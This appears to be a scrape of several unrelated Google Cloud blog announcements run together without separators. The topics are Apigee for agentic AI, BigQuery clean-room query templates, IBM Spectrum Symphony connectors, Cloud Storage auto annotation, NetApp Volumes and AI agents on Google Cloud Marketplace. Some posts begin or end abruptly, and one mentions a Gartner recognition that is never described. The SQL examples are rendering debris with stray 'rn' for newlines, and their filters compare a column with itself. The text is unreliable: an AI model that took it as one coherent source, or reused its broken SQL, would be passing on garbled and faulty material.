Extending API management to gen AI and agentic AI
The rise of AI and agentic workloads is powered by an API nervous system. While AI tools create powerful possibilities, organizations often hit roadblocks moving from pilot to production. At issue are managing, securing, and scaling these solutions — especially with LLMs and the agents that leverage them in highly regulated environments.
Apigee, Google Cloud’s native API management platform, bridges this gap. We are extending our proven capabilities directly to your AI initiatives, helping them deliver real, measurable business value.
Apigee functions as the intelligent, secure proxy for all your AI agents, tools, and backend models, enhancing their security, scalability, and governance. By serving as this crucial gateway, Apigee helps secure agentic workloads against risks, ensures operations are on governed data, and helps control costs.
Managing, governing, and securing agentic AI
A variety of Apigee capabilities help enterprise API and AI platform teams move AI initiatives into production. These capabilities include:
AI productization API products are the the center of the Apigee platform, enabling platform teams to bundle discrete API operations into a product, manage access and quota, and make it available for consumption. Today, Apigee is helping teams move toward AI productization, bundling tools including third-party integrations (from Application Integration), agentic tools such as MCP servers, and of course APIs, into an AI product. This promotes developer reuse, granular access control, and monetization, so organizations can unlock new revenue streams.
Agent-ready tools Apigee’s new API specification boosting capability (currently in Private Preview), based on a multi-agent tool built by Google DeepMind, automatically enhances existing API specifications to make them more discoverable by agents. It does so by including comprehensive examples, error scenarios, and business logic derived from your organization’s API patterns.
AI cost management Customers use Apigee’s native quota policies to enforce token limits at the API or AI product level. Our integration with Looker Studio (a free Google Cloud service) provides API platform teams with the ability to create custom reports on AI token usage that can be shared externally with stakeholders.
Centralized tool catalog and observability Apigee API hub provides a centralized catalog in which to store information about their APIs, MCP servers, and third-party integrations. Built-in semantic search capabilities powered by Gemini help teams discover and reuse tools. Thanks to the Apigee API hub toolset for Agent Development Kit (ADK), developers building custom agents using ADK can easily give agents access to tools from Apigee API hub with a single line of code. API traffic and performance data is integrated into the catalog for access by humans and agents. Further, these same semantic capabilities drive emerging use cases for semantic tool identification.
Tool security and compliance Apigee’s 60+ policies include security policies to help keep tools protected and safe, including native policies for AI safety using Model Armor. Additionally, Apigee Advanced API Security integrates natively with Apigee’s runtime, providing enhanced security capabilities like dynamic API security posture management and abuse detection powered by Google-engineered machine learning models. Finally, Apigee’s enhanced data residency capabilities help support compliant workloads worldwide.
Multi-cloud model routing Apigee serves as a proxy between agents and backend LLM models, connecting agents with tools and providing routing to backend LLM models hosted on and off Google Cloud. Apigee’s circuit-breaking capabilities help ensure that AI and agentic applications remain highly available.
Apigee: Trusted by global leaders
Global leaders trust Apigee to manage mission-critical APIs at scale, even in highly regulated industries. We are committed to continuously investing in Apigee to ensure it remains a world-class, trusted service that meets the evolving needs of our customers. In our opinion,this recognition from Gartner reinforces our commitment to continuous innovation and the delivery of an exceptional developer experience.
Thank you to our customers and partners
We’re incredibly grateful to our community of customers, developers, and partners for your continued support and trust in Apigee. Your feedback and collaboration are invaluable in driving our product roadmap and helping us deliver reliable API management experience.
In today’s data-driven landscape, the ability to collaborate securely and efficiently is paramount. BigQuery data clean rooms provide a robust and secure environment for multiple parties to share, join, and analyze data without compromising sensitive information. Building on this foundation, today, we’re announcing BigQuery data clean room query templates in preview, bringing a new level of control, security, and ease of use to your clean room collaborations. In this post, we explore how these templates can transform your data collaboration workflows.
What are query templates?
Query templates allow data clean room owners to create fixed, reusable queries that run against specific BigQuery tables. These templates accept input parameters and return only the resulting rows, allowing users to gain insights without accessing the raw data. Query templates allow data clean room owners to create fixed, reusable queries that run against a specific controlled environment, reducing the risk of data exfiltration.
Strengthened data leakage prevention: Open-ended exploration within a clean room raises data clean room owner concerns about unintended data exposure. Restricting queries through pre-defined templates significantly reduces the potential for sensitive data breaches while still allowing users to query data in a self-serve manner.
Simplified user onboarding: To ease adoption for users with limited technical expertise, clean rooms utilize simplified query templates that providers can create on behalf of subscribers. This is crucial as many data providers have subscribers who lack proficiency in complex privacy-focused SQL.
Analytical consistency: Get consistent analytical results through controlled query execution. Without this control, enforcing data analysis rules and adhering to privacy regulations can be challenging.
Customizable query templates: Data owners and contributors can design and publish custom, approved queries suited to specific clean room applications. These templates, powered by BigQuery’s table-valued functions (TVFs), let you input entire tables or selected fields, and receive a table as the output.
Using query templates in BigQuery data clean rooms
You can use query templates to facilitate different forms of data collaboration within a clean room, for example:
Single-direction sharing A data publisher creates a query template so that subscribing partners can only run queries defined by the publisher. Query template creators ultimately “self-approve” since no other contributor is added to the clean room.
Example scenario: Steve, a data clean room owner, creates a data clean room called Campaign Analysis and adds a my_campaign dataset with a campaigns table. Steve configures metadata controls to ensure only the metadata schema is visible and subscribers cannot access the source data. Steve then creates a query template by defining a table-valued function from campaigns, restricting all subscribers of the linked dataset to only execute the TVF by parsing their own tables to gain insights on their company’s campaign.
Template syntax:
code_block
<ListValue: [StructValue([(‘code’, ‘campaign_impressions(t1 TABLE<company_id STRING>) AS (rnSELECT WITH AGGREGATION_THRESHOLD OPTIONS(threshold=2, privacy_unit_column=company_id) company, campaign_id, sum(impressions) as impressions FROM my_project.my_campaigns.campaignsrn where company_id=company_id rngroup by company, campaign_idrn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f6143105340>)])]>
Since Steve has appropriate permissions to the campaigns table (e.g. BigQuery Data Owner), he can immediately self-approve the query template after submitting it for review.
Collaborative sharing A clean room owner invites a trusted contributor to propose queries to be run against each other’s data. Both parties can safely propose queries by viewing metadata schemas only, without accessing the underlying shared data. When a query definition references data that does not belong to the template proposer, the template can only be approved by that data’s owner.
Example scenario: Sally, a clean room owner, invites Yoshi, a clean room contributor, to Campaign Analysis. Yoshi can create query templates that query their data along with the owner’s data.
TVF syntax:
code_block
<ListValue: [StructValue([(‘code’, ‘CREATE TABLE FUNCTION campaign_impressions(t1 TABLE<company_id STRING>) AS (rnSELECT WITH AGGREGATION_THRESHOLD OPTIONS(threshold=2, privacy_unit_column=company_id) company, campaign_id, sum(impressions) as impressions FROM my_project.my_campaigns.campaignsrn where company_id=company_idrn group by company, campaign_idrn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f6143105cd0>)])]>
In this example, since Yoshi did not add (and therefore does not own) the campaigns table, once the query template is submitted for approval, only Sally can approve it. This includes the analysis rule thresholds set by Yoshi. To use the query template, Yoshi would subscribe to the clean room and invoke the TVF. Yoshi passes her own table with a field called company_id as the table parameter, and can execute the privacy SQL defined in the query template. Note here that Yoshi does NOT NEED to add their data to the clean room.
Now let’s say Yoshi also adds to the clean room a my_transactions dataset with a transactions table and a products table. Yoshi also configures metadata controls to ensure only the metadata schema is visible and subscribers cannot access the source data.
Sally can now also propose various query templates to join her own data to the transactions table by viewing the table’s metadata schema. A couple examples could be:
Template syntax:
code_block
<ListValue: [StructValue([(‘code’, ‘transactions(t1 TABLE<user_id STRING>) AS (rnSELECT WITH AGGREGATION_THRESHOLD OPTIONS(threshold=5, privacy_unit_column=user_ID) company_id, company, campaign_id, sku, category, date, sum(amount) as amount FROM my_project.my_transactions.transactionsrn where user_id=user_idrn group by company_id, company, campaign_id, sku, category, datern)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f6143105070>)])]>
Example of using join within Query Templates:
code_block
<ListValue: [StructValue([(‘code’, ‘transactions_join(t1 TABLE<company_id STRING>) AS (rnselect company, campaign_id, sku, date, sum(amount) AS total_amount rnFROM my_project.my_transactions.transactionsrnleft join t1rnon transactions.company_id = t1.company_idrngroup by company, campaign_id, sku, datern);’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f6143105c70>)])]>
Note: Only multiple tables owned by the same party can be referenced within the TVF query syntax. See query template limitations for more details.
In this example, since Sally did not add (and therefore does not own) the transactions table, once the query template is submitted for approval, only Yoshi can approve. This includes the analysis rule thresholds set by Sally. To use the query template, Sally would subscribe to the clean room and invoke the TVF. Sally passes her own table with a field called user_ID as the table parameter, and can execute the privacy SQL defined in the query template. Note here that Sally does NOT NEED to add her data to the clean room.
code_block
<ListValue: [StructValue([(‘code’, ‘SELECT * FROM `my-project.campaigns_dcr.transactions`(TABLE `my-project.transactions_dataset.transactions`);’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x7f6141c476a0>)])]>
Since query templates are built using table-valued functions, publishers can be rest assured that query definitions (logic) are not visible to subscribers. Subscribers just see what type of parameters are accepted as input (table name or field), and can only execute TVFs defined in approved query templates. Additionally, data publishers have the ability to ensure the underlying data added to the clean room is not shared with subscribers.
What makes BigQuery query templates different?
BigQuery query templates are a powerful addition to a data analyst’s toolbox, providing a number of benefits:
Enhanced security: Query templates allow data contributors to limit and control the queries executed in a clean room, thereby reducing the risk of accidental or intentional exposure of sensitive data and limit exposure to unnecessary shared data (e.g. you don’t have to share data to the clean room, just add the schema)
Improved governance: By predefining queries, you can better enforce data analysis rules to help support compliance with privacy regulations.
Simplified onboarding: Subscribers who may not be technically proficient in SQL — especially using differential privacy and aggregation threshold sql syntax — can easily use pre-built query templates to gain insights from the data.
Consistent analytical outcomes: With query templates, subscribers use predefined queries, which helps to deliver consistent analytical outcomes.
Streamlined workflows: Query templates save time and effort by standardizing queries for common insights, eliminating the need to explain custom queries to external collaborators.
Faster reporting: With pre-written queries, subscribers can quickly generate reports from the clean room, streamlining their workflow.
Flexible collaboration: Query templates can support single-direction sharing and multi-party collaboration with approval workflow.
Ready to get started? To learn more about query templates in BigQuery data clean rooms, check out the documentation here.
This integration between Google Cloud and IBM Spectrum Symphony gives you access to the benefits of Google Cloud for your grid workloads by supporting common architectures and requirements, namely:
Extending your on-premises cluster to Google Cloud and automatically adding compute capacity to reduce execution time of your jobs, or
Deploying an entire cluster in Google Cloud and automatically provisioning and decommissioning compute resources based on your workloads
These connectors are provided in the form of IBM Spectrum Symphony HostFactory custom cloud providers. They are open-source and can be easily deployed either via Cluster Toolkit or manually.
Partner-built and tested for enterprise scale
To deliver robust, production-ready connectors, we collaborated with key partners who have deep expertise in financial services and HPC. Accenture built the Compute Engine and GKE connectors and Aneo performed rigorous user acceptance testing to ensure they met the stringent demands of our enterprise customers.
“Accenture is proud to have collaborated with Google Cloud to help develop the IBM Spectrum Symphony connectors. Our expertise in both financial services and cloud solutions allows us to enable customers to seamlessly migrate their critical HPC workloads to Google Cloud’s high-performance infrastructure.” – Keith Jackson, Managing Director – Financial Services, Accenture
“At Aneo, we subjected the IBM Spectrum Symphony connectors to rigorous, large-scale testing to ensure they meet the demanding performance and scalability requirements of enterprise HPC. We validated the connector’s ability to efficiently manage up to 5,000 server nodes, confirming its readiness for production workloads.” – William Simon Horn, Cloud HPC Engineer, and Wilfried Kirschenmann, CTO, Aneo
Google Cloud rapidly scales to meet extreme HPC demands, provisioning over 100,000 vCPUs across 5,000 compute pods in under 8 minutes with the new IBM Spectrum Symphony connector for GKE. IBM has tested and supports Spectrum Symphony up to 5,000 compute nodes, so we set this as our target for scale testing the new GCP connector.
We achieved this performance by leveraging innovative GKE features like image preloading and custom compute classes, enabling customers in demanding sectors like FSI to accelerate mission-critical workloads while optimizing for cost and hybrid cloud flexibility.
Powerful features to run your way
The connectors are built to provide the flexibility and control you need to manage complex HPC environments. They are available as open-source software in a Google-owned repository. Key features include:
Support for Compute Engine and GKE: Separate IBM Spectrum Symphony Host Factory cloud providers for Compute Engine and GKE allow you to scale your cluster across both virtual machines and containerized environments.
Flexible consumption models: Support for Spot VMs, on-demand VMs, or a mix of both let you optimize cost and performance.
Template-based provisioning: Use configurable resource templates that align with your workloads requirements.
Comprehensive instance support: Full integration with managed instance group (MIG) APIs, GPUs, Local SSD, and Confidential Computing VMs.
Event-driven management: Pub/Sub integration allows for event-driven resource management for Compute Engine instances.
Kubernetes-native: The GKE connector uses a custom Kubernetes operator with Custom Resource Definitions (CRDs) to manage the entire lifecycle of Symphony compute pods. Leverage GKE’s scaling capabilities and custom hardware like GPUs and TPUs through transparent compatibility with GKE custom computeClasses (CCC) and Node Pool Autoscaler.
High-scalability: The connectors are built for high-performance with asynchronous operations to handle large-scale deployments.
Resiliency: Automatic detection and handling of Spot VM preemptions helps ensure workload reliability.
Logging and monitoring: Integrated with Google Cloud’s operations suite for observability and reporting.
Enterprise support: The connectors are supported as a first-party solution by Google Cloud, with an established escalation path to our development partner, Accenture.
Getting started
You can begin using the IBM Spectrum Symphony connectors for Google Cloud today.
Contact Google Cloud or your Google Cloud account team to learn more about how to migrate and modernize your HPC workloads.
To help ensure the success of our HPC customers, we will continue to invest in the solutions you need to accelerate your research and business goals. We look forward to seeing what you can achieve with the scale and power of Google Cloud.
Organizations interested in AI today have access to amazing computational power with Tensor Processing Units (TPUs) and Graphical Processing Units (GPUs), while foundational models like Gemini are redefining what’s possible. Yet for many enterprises a critical obstacle to AI is the data itself, specifically unstructured data. According to Enterprise Strategy Group, for most organizations, 61% of their total data is unstructured, the vast majority of which sits unanalyzed and unlabeled in archives, so-called “dark data.” But with the help of AI, this untapped resource is an opportunity to unlock a veritable treasure trove of insights.
At the same time, when it comes to unstructured data, traditional tools only scratch the surface, and subject matter experts must build massive, manual preprocessing pipelines and define the data’s semantic meaning. This prevents any real analysis at scale, preventing companies from using even a fraction of what they store.
Now imagine a world where your unstructured data isn’t just stored, but understood. A world where you can ask complex questions of data such as images, videos, and documents, and get interesting answers in return. This isn’t just a futuristic vision — the era of smart storage is upon us. Today we are announcing new auto annotate and object contexts features that use AI to generate metadata and insights on your data, so you can then use your dark data for discovery, curation, and governance at scale. Better yet, the new features relieve you from having to build and manage your own object-analysis data pipelines.
Leveraging AI to transform dark data
Now, as unstructured data lands in Google Cloud, it’s no longer treated as a passive object. Instead, a data pipeline leverages AI to automatically process and understand the data, surfacing key insights and connections. Two new features are integral to this vision: auto annotate, which enriches your data by automatically generating metadata using Google’s pretrained AI models,andobject contexts, which lets you attach custom, actionable tags to your data. Together, these two features can help transform passive data into active assets, unlocking use cases such as rapid data discovery for AI model training, streamlined data curation to reduce model bias, enhanced data governance to protect sensitive information, and the ability to build powerful, stateful workflows directly on your storage.
Making your data smart
Auto annotate,currently in a limited experimental release, automatically generates rich metadata (“annotations”) about objects stored in Cloud Storage buckets by applying Google’s advanced AI models, starting with image objects. Getting started is simple: enable auto annotate for your selected buckets or an entire project, pick one or more available models, and your entire image library will be annotated. Furthermore, new images are automatically annotated as they are uploaded. An annotation’s lifecycle is always tied to its object’s, simplifying management and helping to ensure consistency. Importantly, auto annotate operates under your control, only accessing object content to which you have explicitly granted permissions. Then, you can query the annotations, which are available as object contexts, through Cloud Storage API calls and Storage Insights datasets. The initial release uses pretrained models for generating annotations: object detection with confidence scores, image labeling, and objectionable content detection.
a sample of generated annotations for an object
Then, with object contexts, you can attach custom key-value pair metadata directly to objects in Cloud Storage, including information generated by the new auto annotate feature. Currently in preview, object contexts are natively integrated with Cloud Storage APIs for listing and batch operations, as well as Storage Insights datasets for analysis in BigQuery. Each context includes object creation and modification timestamps, providing valuable lineage information. You can use Identity and Access Management (IAM) permissions to control who can add, change, or remove object contexts. When migrating data from Amazon S3 using Cloud Storage APIs, existing S3 Object Tags are automatically converted into contexts.
In short, object contexts provide a flexible and native way to add context to enrich your data. Combined with a smart storage feature like auto annotations, object contexts convert data into information, letting you build sophisticated data management workflows directly within Cloud Storage.
Now, let’s take a deeper look at some of the new use cases these smart storage features deliver.
1. Data discovery
One of the most significant challenges in building new AI applications is data discovery — how to find the most relevant data across an enterprise’s vast and often siloed data stores. Locating specific images or information within petabytes of unstructured data can feel impossible. Auto annotate automatically generates rich, descriptive annotations for your data in Cloud Storage. Annotations, including labels and detected objects, are available within object contexts and fully indexed in BigQuery. After generating embeddings for them, you can then use BigQuery to run a semantic search for these annotations, effectively solving the “needle in a haystack” problem. For example, a large retailer with millions of product images can use auto annotate and BigQuery to quickly find ‘red dresses’ or ‘leather sofas’, accelerating catalog management and marketing efforts.
2. Data curation for AI
Building effective AI models requires carefully curated datasets. Sifting through data to ensure it is widely representative (e.g., “does this dataset have cars in multiple colors?”) to reduce model bias, or to select specific training examples (e.g., “Find images with red cars”), is both time-consuming and error-prone. Auto annotate can identify attributes like colors and object types, to automate selecting balanced datasets.
For instance, an autonomous vehicle company training models could use petabytes of on-road camera data to recognize traffic signs, using auto annotate to identify and extract images that contain the word ‘Stop’ or ‘Pedestrian Crossing’.
Vivint, a smart home and security company, has been using auto annotate to find and understand their data.
“Our customers trust us to help make their homes and lives safer, smarter, and more convenient, and AI is at the heart of our product and customer experience innovations. Cloud Storage auto annotate’s rich metadata delivered in BigQuery helps us scale our data discovery and curation efforts, speeding up our AI development process from 6 months to as little as 1 month by finding the needle-in-a-haystack data essential to improve our models.” – Brandon Bunker, VP of Product, AI, Vivint
3. Governing unstructured data at scale
Unstructured data is constantly growing, and manually managing and governing that data to identify sensitive information, detect policy violations, or categorize it for lifecycle management is a challenge. Auto annotate and object contexts help solve these data governance and compliance challenges. For example, a retail customer can use auto annotate to identify and flag images containing visible customer personally identifiable information (PII) such as shipping labels or order forms.This information, stored in object context, can then trigger automated governance actions such as moving flagged objects to a restricted bucket or initiating a review process.
BigID, a partner building solutions on Cloud Storage, reports that using object contexts is helping them manage their customers’ risk:
“Object contexts gives us a way to take the outputs of BigID’s industry-leading data classification solutions and apply labels to Cloud Storage objects. Object contexts will allow BigID labels to shed light onto data in Cloud Storage: identifying objects which contain sensitive information and helping them understand and manage their risk across AI, security, and privacy.” – Marc Hebrard, Principal Technical Architect, BigID
The future is bright for your data
At Google Cloud, we’re committed to building a future where your data is not just a passive asset but an active catalyst for innovation. Don’t keep your valuable data in the dark. Bring your data to Cloud Storage and enable auto annotation and object contexts to unlock its full potential with Gemini, Vertex AI, and BigQuery.
You can start using object contexts today, and reach out to us for an early look at auto annotate. Once you have access, simply enable auto annotate for selected buckets or on an entire project, pick one or more available models, and your entire image library will be annotated. You can then query the annotations that are available as object contexts through Cloud Storage API calls and Storage Insights datasets.
Migrating enterprise applications to the cloud requires a storage foundation that can handle everything from high-performance block workloads to globally distributed file access. To solve these challenges, we’re thrilled to announce two new capabilities for Google Cloud NetApp Volumes: unified iSCSI block and file storage to enable your storage area network (SAN) migrations, and NetApp FlexCache to accelerate your hybrid cloud workloads. These features, along with a new integration for agents built with Gemini Enterprise, can help you modernize even your most demanding applications.
Run your most demanding SAN workloads on Google Cloud
For decades, enterprises have relied on NetApp for both network attached storage (NAS) and SAN workloads on-premises. We’re now bringing that same trusted technology to a fully managed cloud service, allowing you to migrate latency-sensitive applications to Google Cloud without changing their underlying architecture.
Our unified service is engineered for enterprise-grade performance, with features including:
Low latency engineered for your most demanding applications
Throughput that can burst up to 5 GiB/s with up to 160K random IOPS per volume
Independent scaling of capacity, throughput, and IOPS to control costs
Integrated data protection with NetApp Snapshots for rapid recovery and ransomware defense
iSCSI block protocol support is available now via private preview for interested customers.
Accelerate your hybrid cloud with NetApp FlexCache
For organizations with distributed teams and a hybrid cloud strategy, providing fast access to shared datasets is critical. NetApp FlexCache, a new capability for Google Cloud NetApp Volumes, provides high-performance, local read caches of remote volumes. This helps distributed teams access shared datasets as if they were local, and supports compute bursting for workloads that need low-latency data access, improving productivity and collaboration across your entire organization. FlexCache is available now in preview via an allowlist.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x7f613faecfa0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Bring your enterprise data to Gemini Enterprise
We’re also announcing that Google Cloud NetApp Volumes now serves as a data store for Gemini Enterprise. This integration unlocks new possibilities for retrieval-augmented generation (RAG), allowing you to ground your AI models on your own secure, factual, enterprise-grade data. Your data remains securely governed in NetApp Volumes and is quickly available for search and inference workflows, without the need for complex ETL or manual integrations.
Additional enhancements for your cloud environment
Google Cloud NetApp Volumes has several other new capabilities to help you modernize your data estate:
NetApp SnapMirror: You can now quickly replicate mission-critical data between on-prem NetApp systems and Google Cloud, providing a zero recovery point objective (RPO) and near-zero recovery time objective (RTO).
High-performance for large volumes: For applications with massive datasets such as HPC, AI, and EDA, we now offer large-capacity volumes that scale from 15TiB to 3PiB, with over 21GiB/s of throughput per volume.
Auto-tiering: To help you manage costs, built-in auto-tiering dynamically moves infrequently accessed data to lower-cost storage, with cold data priced at just $0.03/GiB for the Flex service level. As a turnkey, integrated feature, auto-tiering is transparent to any application built on Google Cloud NetApp Volumes, and can support a tiering threshold of anywhere from 2-183 days, with dynamically adjustable policy support.
Get started
Whether you’re migrating your enterprise SAN data, powering AI with Gemini Enterprise, or running high-throughput EDA workloads, Google Cloud NetApp Volumes can help you modernize your data estate. To learn more and get started, explore the product documentation.
Your team wants to deploy AI agents, and you’re probably wondering: Will they work together? Can we control the costs? How do we maintain security standards? These are important questions that every enterprise faces when adopting new AI technology. Google Cloud Marketplacegives you a proven path forward, whether you need to build custom AI agents, buy pre-built solutions for faster deployment, or find something tailored in between.
Google Cloud Marketplace connects you with thousands of pre-vetted AI agents from established agent builders and partners which have been validated to integrate with Gemini Enterprise. The marketplace gives leaders more control, better governance, predictable OpEx pricing models, and faster time-to-value through simplified procurement and deployment.
For agent builders, Google Cloud Marketplace offers global reach, channel sales capabilities, and co-selling opportunities with Google Cloud. This model helps agent builders monetize their AI innovations through Google Cloud’s global distribution. A recently commissioned Futurum Research study shows that technology vendors selling through Google Cloud Marketplace see 112% larger deal sizes, longer sales agreements, faster deal cycles, and improved customer retention.
For customers: Deploy enterprise-ready AI agents quickly and easily
Google Cloud Marketplace gives enterprises access to specialized, ready-to-use AI agents and agent tools. Teams can use Gemini-powered natural language search to discover partner-built agents that have been validated by Google Cloud for A2A and Gemini Enterprise integration.
Find and purchase efficiently: Customers can source high-quality and validated AI agents for their use cases from a growing ecosystem of agent builders, evaluate their capabilities, and purchase them through Google Cloud Marketplace using their existing Google Cloud account for simplified procurement and consolidated billing. Employees can browse the AI agent finder to discover agents which match their specific use cases. For agents that have been validated for Gemini Enterprise, employees can follow their organization’s standard process to request that their IT administrator procure the agents via Google Cloud Marketplace and add them to their Agent Gallery.
Quick and secure setup: After purchasing, administrators can immediately register new agents in their Gemini Enterprise environment. Integration is secure and managed through standard cloud protocols.
Enterprise-grade governance: Administrators can manage which agents can be deployed and accessed through Gemini Enterprise according to their policies.If administrators want to manage access and cost control for third-party agents along with other Google Cloud Marketplace solutions, such as datasets, agent tools, infrastructure and SaaS solutions, they can continue to do so through Identity and Access Management (IAM) and Private Marketplace capabilities.
For partners: Reach enterprise customers faster
For partners, making AI agents available in Gemini Enterprise creates an additional go-to-market approach where enterprise customers can adopt partner-built solutions securely and reliably. We’ve simplified partner onboarding for AI agents as a service, letting builders focus on innovation while Google Cloud Marketplace handles the transactions. The setup is straightforward.
Simplified onboarding with the Agent Cards: Getting started requires only a link to your Agent Card – a standard JSON file based on the Agent2Agent (A2A) protocol. Google Cloud Marketplace automatically ingests the agent’s metadata, capabilities, and endpoints, significantly reducing listing process complexity.
Clear agent validation framework: Google Cloud has also enhanced our AI agent ecosystem program, providing a clear framework for partners to validate that their agents use A2A and Gemini. We’ve also introduced the new “Google Cloud Ready – Gemini Enterprise” designation to recognize agents that meet our highest standards for performance and quality, helping accelerate adoption of trusted solutions and giving partners a new path to commercialize their agents.
Flexible monetization: Partners can choose the business model that works best for their customer use cases. Options include self-serve agents with standard subscription-based pricing, usage-based pricing or custom pricing through Private Offers. Partners can also position agents as extensions to their existing SaaS platforms, offering them to customers with appropriate entitlements. Outcome-based pricing models are also supported, allowing partners to monetize based on business outcomes, such as number of anomalies detected, reports generated, customer support tickets resolved, and more.
Automated entitlement and billing: When customers make a purchase, the platform instantly notifies partner systems of new entitlements through automated Pub/Sub notifications and the Cloud Commerce Partner Procurement API. This enables automatic customer provisioning and user access authorization without manual intervention.
Leading companies building AI agents today
Here are some of the leading companies building AI agents for Gemini Enterprise. These partners represent different industries and use cases, showing the breadth of solutions already available to enterprise customers.
Amplitude: Amplitude AI Agents work 24/7 as extensions of product, marketing, and data teams—analyzing behavior, proposing experiments, optimizing experiences, and tracking impact with speed and confidence.
Avalara:Avalara Agentic Tax and Compliance™ automates compliance across the business ecosystem. Avi, an always-on Avalara Agent for compliance, goes beyond assisting to doing the work; observing, advising, and executing within the environments where business happens.
Box:The Box AI Agent lets users ask questions, summarize complex documents, extract data from files, and generate new content while respecting existing permissions in Box.
CARTO:CARTO’s Site Selection for Gemini Enterprise agentaids the analysis and comparison of physical commercial sites for retail, real estate, finance, and other businesses looking to expand or manage their real-world footprint.
Cotality:Cotality’s Payoff Analysis AI Agent empowers mortgage lenders and servicers to strengthen retention strategies and reduce portfolio runoff. It leverages origination and payoff data to deliver instant intelligence on loan transactions and subsequent activities, competitor wins, and recapture performance.
Dun & Bradstreet:Dun & Bradstreet’s Look Up agent uses the globally trusted D-U-N-S® Number and advanced identity resolution to identify and match entities across internal and third-party sources and deliver a unified view of business relationships, enabling accurate, efficient data integration across enterprise workflows like marketing, sales, compliance, and risk management.
Dynatrace: Dynatrace’s A2A integration connects its observability platform via the A2A protocol, enabling advanced analysis and automated incident response. It unifies Dynatrace AI with an organization’s chosen agents to accelerate problem remediation and prevention, while automatically optimizing cloud environments.
Elastic:The Elastic AI Agentprovides fast, high-quality retrieval across structured and unstructured data. It helps analyze large volumes of records, technical support issues, security incidents or alerts to accelerate outcomes for investigation tasks. Uncover threats, find emerging product issues, and understand customer trends through the Elastic AI Agent.
Fullstory:Fullstory’s internal workflow agent analyzes and quantifies gaps in organizations’ business processes and software workflows to help determine the most impactful fixes. Through pinpointing where employees face the highest friction, Fullstory’s agent shows teams exactly where to deploy AI to cut costs and boost productivity.
HCLTech:HCLTech Netsight AI Agent on Google Cloud delivers virtual network troubleshooting for RAN networks providing autonomous analysis to identify network anomalies, root cause, and bottlenecks. Netsight analyzes data in near real time and combines configuration data, performance analysis, and historical trend data to proactively address issues and improve network performance.
HubSpot:The HubSpot Academy Agent is an AI-powered assistant that brings HubSpot knowledge and documentation directly into Gemini Enterprise. By making trusted, source-linked guidance instantly accessible, it helps users get answers, learn best practices, and work with confidence in HubSpot.
Invideo: Invideo’s Video AI lets users create videos of any length and type using just prompts. Its multi-agent system assigns specialized AI agents to every stage of production, optimizing creation and ensuring coherent output. Marketers and content creators can now produce videos that look like million-dollar productions, effortlessly and with confidence.
Manhattan Associates: The Solution Navigator agent provides instant answers on Manhattan Active solutions, policies, and operations to accelerate response times and efficiency.
Optimizely: Optimizely Opal, available on the Google Cloud Marketplace, is the agent orchestration platform built for marketers—connecting data, content, and workflows to power intelligent automation across the Optimizely ecosystem. With pre-built and custom agents, drag-and-drop workflow design, and Gemini-powered reasoning, Opal helps teams scale marketing performance faster, with greater precision.
Orion by Gravity: A proactive AI analyst for enterprises. Business users can ask Orion any question, and behind the scenes it runs deep, multi-agent analysis. Accurate, context-aware, and proactive, Orion detects anomalies, surfaces insights, and even asks its own questions – delivering faster, smarter decisions.
Pegasystems: Pega Self Study Agent enables enterprises to unlock insights from Pega technical documentation and enablement directly in Gemini Enterprise, allowing Pega enthusiasts to quickly get the answers needed to build, manage, and troubleshoot their applications. This provides real-time access to Pega’s publicly available technical documentation, learning course, marketing, and enablement.
Quantiphi:Quantiphi’s sQrutinizer is an agentic intent optimization framework that supercharges Conversational Agent performance. A semi-automated workbench monitors fallbacks and false-positives, retraining the agent in a closed-loop system. This helps customer experience teams proactively enhance accuracy and unlock the full potential of their Google Cloud agents.
Quantum Metric: Felix AI Agenticacts as a 24/7 digital analyst, turning fragmented customer data into clear answers and next steps for every employee.
S&P Global:The Data Retrieval agent helps users analyze earnings calls, perform market research, and retrieve financial metrics–all with direct source citations.
Supermetrics: The Supermetrics Marketing Intelligence Agent facilitates deep, cross-channel data exploration and analysis. It simplifies your marketing data so that anyone can search, explore, and find the answers they need.
Trase Systems: The Trase AI Agent Platform tactically delivers and implements end-to-end AI agent applications to automate complex administrative workflows. Trase replaces manual, repetitive processes with autonomous AI agents that are highly secure, audit-ready, and proven to deliver measurable ROI through a shared savings model.
UiPath: UiPath multi-agent capabilities power seamless collaboration among intelligent agents to automate complex processes. The Medical Record Summarization agent extracts and structures medical data and leverages the A2A protocol. UiPath will extend A2A integration across all agents in its orchestrator, enhancing scalability, efficiency, and human-in-the-loop decision-making.
Get started
The way enterprises deploy AI is changing rapidly. Google Cloud Marketplace represents an important step in building a trusted ecosystem where AI agents and agent tools work together reliably for enterprise use.
Looking for AI agents? Search for agents in our discovery tool.
Ready to sell agents through Google Cloud Marketplace? Get started today.
Interested in building Google Cloud Ready – Gemini Enterprise agents? Learn about our enhanced AI Agent Program and reach customers globally.